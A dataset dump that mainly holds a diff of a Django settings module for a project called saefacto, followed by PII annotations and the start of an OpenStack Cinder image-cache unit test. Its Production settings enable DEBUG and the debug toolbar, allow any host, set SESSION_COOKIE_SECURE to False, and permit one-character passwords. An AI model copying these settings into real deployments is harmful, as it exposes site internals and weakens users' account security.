""django.contrib.auth.backends.ModelBackend"", + ""allauth.account.auth_backends.AuthenticationBackend"", + ) + + # Some really nice defaults + ACCOUNT_AUTHENTICATION_METHOD = ""username"" + ACCOUNT_EMAIL_REQUIRED = True + ACCOUNT_EMAIL_VERIFICATION = ""mandatory"" + ACCOUNT_PASSWORD_MIN_LENGTH = 1 + ########## END AUTHENTICATION CONFIGURATION + + ########## Custom user app defaults + # Select the correct user model + AUTH_USER_MODEL = ""users.User"" + LOGIN_REDIRECT_URL = ""users:redirect"" + ########## END Custom user app defaults + + ########## SLUGLIFIER + AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify"" + ########## END SLUGLIFIER + + ########## LOGGING CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging + # A sample logging configuration. The only tangible logging + # performed by this configuration is to send an email to + # the site admins on every HTTP 500 error when DEBUG=False. + # See http://docs.djangoproject.com/en/dev/topics/logging for + # more details on how to customize your logging configuration. 
+ LOGGING = { + 'version': 1, + 'disable_existing_loggers': False, + 'filters': { + 'require_debug_false': { + '()': 'django.utils.log.RequireDebugFalse' + } + }, + 'handlers': { + 'mail_admins': { + 'level': 'ERROR', + 'filters': ['require_debug_false'], + 'class': 'django.utils.log.AdminEmailHandler' + } + }, + 'loggers': { + 'django.request': { + 'handlers': ['mail_admins'], + 'level': 'ERROR', + 'propagate': True, + }, + } + } + ########## END LOGGING CONFIGURATION + + + ########## Your common stuff: Below this line define 3rd party libary settings + + +class Local(Common): + + ########## DEBUG + DEBUG = values.BooleanValue(True) + TEMPLATE_DEBUG = DEBUG + ########## END DEBUG + + ########## INSTALLED_APPS + INSTALLED_APPS = Common.INSTALLED_APPS + ########## END INSTALLED_APPS + + ########## Mail settings + EMAIL_HOST = ""localhost"" + EMAIL_PORT = 1025 + EMAIL_BACKEND = values.Value('django.core.mail.backends.console.EmailBackend') + ########## End mail settings + ########## DATABASE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases + #DATABASES = values.DatabaseURLValue('postgres://localhost/projetosgt') + DATABASES = values.DatabaseURLValue('sqlite:////{0}.sqlite'.format(join(BASE_DIR, 'sae_db'))) + ########## END DATABASE CONFIGURATION + + ########## django-debug-toolbar + MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',) + INSTALLED_APPS += ('debug_toolbar',) + + INTERNAL_IPS = ('127.0.0.1',) + + DEBUG_TOOLBAR_CONFIG = { + 'INTERCEPT_REDIRECTS': False, + 'SHOW_TEMPLATE_CONTEXT': True, + } + ########## end django-debug-toolbar + + ########## Your local stuff: Below this line define 3rd party libary settings + #SITETREE_MODEL_TREE = 'sitetree_smartadmin.SmartTree' + SITETREE_MODEL_TREE_ITEM = 'sitetree_smartadmin.SmartTreeItem' + +class Production(Common): + + ########## INSTALLED_APPS + INSTALLED_APPS = Common.INSTALLED_APPS + INSTALLED_APPS += ('allauth.socialaccount.providers.facebook', + 'allauth.socialaccount.providers.github', ) + ########## END INSTALLED_APPS + + ########## SECRET KEY + SECRET_KEY = values.SecretValue() + ########## END SECRET KEY + + ########## django-secure + INSTALLED_APPS += (""djangosecure"", ) + + # set this to 60 seconds and then to 518400 when you can prove it works + SECURE_HSTS_SECONDS = 60 + SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True) + SECURE_FRAME_DENY = values.BooleanValue(True) + SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True) + SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True) + SESSION_COOKIE_SECURE = values.BooleanValue(False) + SESSION_COOKIE_HTTPONLY = values.BooleanValue(True) + SECURE_SSL_REDIRECT = values.BooleanValue(True) + ########## end django-secure + + ########## SITE CONFIGURATION + # Hosts/domain names that are valid for this site + # See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts + ALLOWED_HOSTS = [""*""] + ########## END SITE CONFIGURATION + + INSTALLED_APPS += (""gunicorn"", ) + + ########## STORAGE CONFIGURATION + # See: http://django-storages.readthedocs.org/en/latest/index.html + INSTALLED_APPS += ( + 'storages', + ) + + # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings + STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage' + + # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings + AWS_ACCESS_KEY_ID = values.SecretValue() + AWS_SECRET_ACCESS_KEY = values.SecretValue() + 
AWS_STORAGE_BUCKET_NAME = values.SecretValue() + AWS_AUTO_CREATE_BUCKET = True + AWS_QUERYSTRING_AUTH = False + + # see: https://github.com/antonagestam/collectfast + AWS_PRELOAD_METADATA = True + INSTALLED_APPS += (""collectfast"", ) + + # AWS cache settings, don't change unless you know what you're doing: + AWS_EXPIREY = 60 * 60 * 24 * 7 + AWS_HEADERS = { + 'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY, + AWS_EXPIREY) + } + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url + STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME + ########## END STORAGE CONFIGURATION + + ########## EMAIL + DEFAULT_FROM_EMAIL = values.Value( + 'saefacto dummy@email.com') + EMAIL_HOST = values.Value('smtp.sendgrid.com') + EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_PASSWORD"") + EMAIL_HOST_USER = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_USERNAME"") + EMAIL_PORT = values.IntegerValue(587, environ_prefix="""", environ_name=""EMAIL_PORT"") + EMAIL_SUBJECT_PREFIX = values.Value('[saefacto] ', environ_name=""EMAIL_SUBJECT_PREFIX"") + EMAIL_USE_TLS = True + SERVER_EMAIL = EMAIL_HOST_USER + ########## END EMAIL + + ########## TEMPLATE CONFIGURATION + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs + TEMPLATE_LOADERS = ( + ('django.template.loaders.cached.Loader', ( + 'django.template.loaders.filesystem.Loader', + 'django.template.loaders.app_directories.Loader', + )), + ) + ########## END TEMPLATE CONFIGURATION + + ########## CACHING + # Only do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on Windows. + try: + # See: https://github.com/rdegges/django-heroku-memcacheify + from memcacheify import memcacheify + CACHES = memcacheify() + except ImportError: + CACHES = values.CacheURLValue(default=""memcached://127.0.0.1:11211"") + ########## END CACHING + + ########## Your production stuff: Below this line define 3rd party library settings + + ########## DEBUG + DEBUG = values.BooleanValue(True) + TEMPLATE_DEBUG = DEBUG + ########## END DEBUG + ########## django-debug-toolbar + MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',) + INSTALLED_APPS += ('debug_toolbar',) + + INTERNAL_IPS = ('127.0.0.1',) + + DEBUG_TOOLBAR_CONFIG = { + 'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel'], + 'SHOW_TEMPLATE_CONTEXT': True, + } + ########## end django-debug-toolbar + + +####################################################################################### +# terribly ugly hack to make PyCharm recognize the libraries +# the code below will never be executed +if 1 == 2: + INSTALLED_APPS = ( + # Default Django apps: + 'django.contrib.auth', + 'django.contrib.contenttypes', + 'django.contrib.sessions', + 'django.contrib.sites', + 'django.contrib.messages', + 'django.contrib.staticfiles', + + # Useful template tags: + # 'django.contrib.humanize', + + # Admin + 'django.contrib.admin', + + 'south', # Database migration helpers: + 'crispy_forms', # Form layouts + 'avatar', # for user avatars + 'sitetree', + 'sitetree_smartadmin', + 'django_user_agents', + 'statici18n', # javascript + + 'users', # custom users app + 'core', + 'main', + + # Needs to come last for now because of a weird edge case between + # South and allauth + 'allauth', # registration + 'allauth.account', # registration + 'allauth.socialaccount', # registration + ) + ########## END APP 
CONFIGURATION + + ########## MIDDLEWARE CONFIGURATION + MIDDLEWARE_CLASSES = ( + 'django.contrib.sessions.middleware.SessionMiddleware', + 'django.middleware.common.CommonMiddleware', + 'django.middleware.csrf.CsrfViewMiddleware', + 'django.contrib.auth.middleware.AuthenticationMiddleware', + 'django.contrib.messages.middleware.MessageMiddleware', + 'django.middleware.clickjacking.XFrameOptionsMiddleware', + ) + ########## END MIDDLEWARE CONFIGURATION + + ########## DEBUG + # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug + DEBUG = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug + TEMPLATE_DEBUG = DEBUG + ########## END DEBUG + + ########## SECRET CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key + # Note: This key is only used for development and testing. + # In production, this is changed to a values.SecretValue() setting + SECRET_KEY = ""CHANGEME!!!"" + ########## END SECRET CONFIGURATION + + ########## FIXTURE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS + FIXTURE_DIRS = ( + join(BASE_DIR, 'fixtures'), + ) + ########## END FIXTURE CONFIGURATION + + ########## EMAIL CONFIGURATION + EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend') + ########## END EMAIL CONFIGURATION + + ########## MANAGER CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins + ADMINS = ( + ('Fábio C. Barrionuevo da Luz', dummy@email.com'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers + MANAGERS = ADMINS + ########## END MANAGER CONFIGURATION + + ########## DATABASE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases + + ########## END DATABASE CONFIGURATION + + ########## CACHING + # Do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on Windows. 
+ # memcacheify is what's used in Production + CACHES = { + 'default': { + 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', + 'LOCATION': '' + } + } + ########## END CACHING + + ########## GENERAL CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone + TIME_ZONE = 'America/Los_Angeles' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code + LANGUAGE_CODE = 'en-us' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id + SITE_ID = 1 + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n + USE_I18N = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n + USE_L10N = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz + USE_TZ = True + ########## END GENERAL CONFIGURATION + + ########## TEMPLATE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors + TEMPLATE_CONTEXT_PROCESSORS = ( + 'django.contrib.auth.context_processors.auth', + ""allauth.account.context_processors.account"", + ""allauth.socialaccount.context_processors.socialaccount"", + 'django.core.context_processors.debug', + 'django.core.context_processors.i18n', + 'django.core.context_processors.media', + 'django.core.context_processors.static', + 'django.core.context_processors.tz', + 'django.contrib.messages.context_processors.messages', + 'django.core.context_processors.request', + # Your stuff: custom template context processers go here + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs + TEMPLATE_DIRS = ( + join(BASE_DIR, 'templates'), + ) + + TEMPLATE_LOADERS = ( + 'django.template.loaders.filesystem.Loader', + 'django.template.loaders.app_directories.Loader', + ) + + # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs + CRISPY_TEMPLATE_PACK = 'bootstrap3' + ########## END TEMPLATE CONFIGURATION + + ########## STATIC FILE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root + STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles') + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url + STATIC_URL = '/static/' + + # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS + STATICFILES_DIRS = ( + join(BASE_DIR, 'static'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders + STATICFILES_FINDERS = ( + 'django.contrib.staticfiles.finders.FileSystemFinder', + 'django.contrib.staticfiles.finders.AppDirectoriesFinder', + ) + ########## END STATIC FILE CONFIGURATION + + ########## MEDIA CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root + MEDIA_ROOT = join(BASE_DIR, 'media') + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url + MEDIA_URL = '/media/' + ########## END MEDIA CONFIGURATION + + ########## URL Configuration + ROOT_URLCONF = 'config.urls' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application + WSGI_APPLICATION = 'config.wsgi.application' + ########## End URL Configuration + + ########## AUTHENTICATION CONFIGURATION + AUTHENTICATION_BACKENDS = ( + ""django.contrib.auth.backends.ModelBackend"", + ""allauth.account.auth_backends.AuthenticationBackend"", + ) + + # Some really nice defaults + ACCOUNT_AUTHENTICATION_METHOD = ""username"" + ACCOUNT_EMAIL_REQUIRED = True + ACCOUNT_EMAIL_VERIFICATION = ""mandatory"" + ########## END AUTHENTICATION 
CONFIGURATION + + ########## Custom user app defaults + # Select the correct user model + AUTH_USER_MODEL = ""users.User"" + LOGIN_REDIRECT_URL = ""users:redirect"" + ########## END Custom user app defaults + + ########## SLUGLIFIER + AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify"" + ########## END SLUGLIFIER + + ########## LOGGING CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging + # A sample logging configuration. The only tangible logging + # performed by this configuration is to send an email to + # the site admins on every HTTP 500 error when DEBUG=False. + # See http://docs.djangoproject.com/en/dev/topics/logging for + # more details on how to customize your logging configuration. + LOGGING = { + 'version': 1, + 'disable_existing_loggers': False, + 'filters': { + 'require_debug_false': { + '()': 'django.utils.log.RequireDebugFalse' + } + }, + 'handlers': { + 'mail_admins': { + 'level': 'ERROR', + 'filters': ['require_debug_false'], + 'class': 'django.utils.log.AdminEmailHandler' + } + }, + 'loggers': { + 'django.request': { + 'handlers': ['mail_admins'], + 'level': 'ERROR', + 'propagate': True, + }, + } + } + ########## END LOGGING CONFIGURATION + + + ########## Your common stuff: Below this line define 3rd party libary settings +",24139,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['IP_ADDRESS', '127.0.0.1'], ['URL', ""https://s3.amazonaws.com/%s/'""], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['PERSON', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['LOCATION', 'django.contrib.messages'], ['PERSON', 'LOCAL_APPS'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', ""Fábio C. Barrionuevo da Luz'""], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['PERSON', 'EMAIL_PORT'], ['LOCATION', 'projetosgt'], ['PERSON', 'sae_db'], ['PERSON', 'INTERCEPT_REDIRECTS'], ['PERSON', 'SITETREE_MODEL_TREE_ITEM'], ['PERSON', 'SmartTreeItem'], ['NRP', 'SECRET_KEY'], ['DATE_TIME', 'this to 60 seconds'], ['NRP', 'SECURE_CONTENT_TYPE_NOSNIFF'], ['LOCATION', 'AWS_SECRET_ACCESS_KEY'], ['PERSON', 'AWS_STORAGE_BUCKET_NAME'], ['LOCATION', 'https://s3.amazonaws.com/%s/'], ['PERSON', 'EMAIL_PORT'], ['PERSON', 'SERVER_EMAIL = EMAIL_HOST_USER'], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'terrivelmente feio para fazer o Pycharm'], ['LOCATION', 'django.contrib.messages'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', ""Fábio C. 
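The saefacto settings row above defines Common, Local and Production as django-configurations classes; none of them takes effect until the process picks one at startup. A minimal manage.py bootstrap under the usual django-configurations conventions follows; 'config.settings' is an assumed module path inferred from the row's config.urls and config.wsgi naming:

#!/usr/bin/env python
# Sketch of the manage.py bootstrap that django-configurations expects for
# the class-based settings above. "config.settings" is an assumed path.
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings")
    # Selects the Configuration subclass: Common, Local or Production.
    os.environ.setdefault("DJANGO_CONFIGURATION", "Local")

    from configurations.management import execute_from_command_line

    execute_from_command_line(sys.argv)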
Barrionuevo da Luz'""], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['URL', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts'], ['URL', 'http://django-storages.readthedocs.org/en/latest/index.html'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://github.com/antonagestam/collectfast'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'https://github.com/rdegges/django-heroku-memcacheify'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 
'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'CallingFormat.SU'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'agents.middleware.Us'], ['URL', 'values.Bo'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re'], ['URL', 'values.Bo'], ['URL', 'Common.IN'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.co'], ['URL', 'toolbar.middleware.De'], ['URL', 'smartadmin.Sm'], ['URL', 'smartadmin.Sm'], ['URL', 'Common.IN'], ['URL', 'allauth.socialaccount.pro'], ['URL', 'allauth.socialaccount.providers.gi'], ['URL', 'values.Se'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'storages.ba'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 
'values.Va'], ['URL', 'email.com'], ['URL', 'values.Va'], ['URL', 'smtp.sendgrid.com'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Int'], ['URL', 'values.Va'], ['URL', 'django.template.loaders.ca'], ['URL', 'django.template.loaders.fi'], ['URL', 'values.Ca'], ['URL', 'values.Bo'], ['URL', 'toolbar.middleware.De'], ['URL', 'toolbar.panels.redirects.Red'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re']]" +72,"# Copyright (C) 2015 Pure Storage, Inc. +# +# Licensed under the Apache License, Version 2.0 (the ""License""); you may +# not use this file except in compliance with the License. You may obtain +# a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT +# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the +# License for the specific language governing permissions and limitations +# under the License. 
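+
+# Descriptive note (added for readability, not part of the upstream file):
+# these unit tests exercise cinder's image-volume cache -- entry lookup and
+# eviction notifications, cache-entry creation, and the ensure_space()
+# max_gb/max_count eviction limits.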
+ +from datetime import timedelta +import ddt +import mock + +from oslo_utils import timeutils + +from cinder import context as ctxt +from cinder.db.sqlalchemy import models +from cinder.image import cache as image_cache +from cinder import objects +from cinder import test +from cinder.tests.unit import fake_constants as fake + + +@ddt.ddt +class ImageVolumeCacheTestCase(test.TestCase): + + def setUp(self): + super(ImageVolumeCacheTestCase, self).setUp() + self.mock_db = mock.Mock() + self.mock_volume_api = mock.Mock() + self.context = ctxt.get_admin_context() + self.volume = models.Volume() + vol_params = {'id': fake.VOLUME_ID, + 'host': 'foo@bar#whatever', + 'cluster_name': 'cluster', + 'size': 0} + self.volume.update(vol_params) + self.volume_ovo = objects.Volume(self.context, **vol_params) + + def _build_cache(self, max_gb=0, max_count=0): + cache = image_cache.ImageVolumeCache(self.mock_db, + self.mock_volume_api, + max_gb, + max_count) + cache.notifier = self.notifier + return cache + + def _build_entry(self, size=10): + entry = { + 'id': 1, + 'host': 'test@foo#bar', + 'cluster_name': 'cluster@foo#bar', + 'image_id': 'PI:KEY', + 'image_updated_at': timeutils.utcnow(with_timezone=True), + 'volume_id': '70a599e0-31e7-49b7-b260-868f441e862b', + 'size': size, + 'last_used': timeutils.utcnow(with_timezone=True) + } + return entry + + def test_get_by_image_volume(self): + cache = self._build_cache() + ret = {'id': 1} + volume_id = '70a599e0-31e7-49b7-b260-868f441e862b' + self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret + entry = cache.get_by_image_volume(self.context, volume_id) + self.assertEqual(ret, entry) + + self.mock_db.image_volume_cache_get_by_volume_id.return_value = None + entry = cache.get_by_image_volume(self.context, volume_id) + self.assertIsNone(entry) + + def test_evict(self): + cache = self._build_cache() + entry = self._build_entry() + cache.evict(self.context, entry) + self.mock_db.image_volume_cache_delete.assert_called_once_with( + self.context, + entry['volume_id'] + ) + + msg = self.notifier.notifications[0] + self.assertEqual('image_volume_cache.evict', msg['event_type']) + self.assertEqual('INFO', msg['priority']) + self.assertEqual(entry['host'], msg['payload']['host']) + self.assertEqual(entry['image_id'], msg['payload']['image_id']) + self.assertEqual(1, len(self.notifier.notifications)) + + @ddt.data(True, False) + def test_get_entry(self, clustered): + cache = self._build_cache() + entry = self._build_entry() + image_meta = { + 'is_public': True, + 'owner': '70a599e0-31e7-49b7-b260-868f441e862b', + 'properties': { + 'virtual_size': '1.7' + }, + 'updated_at': entry['image_updated_at'] + } + (self.mock_db. + image_volume_cache_get_and_update_last_used.return_value) = entry + if not clustered: + self.volume_ovo.cluster_name = None + expect = {'host': self.volume.host} + else: + expect = {'cluster_name': self.volume.cluster_name} 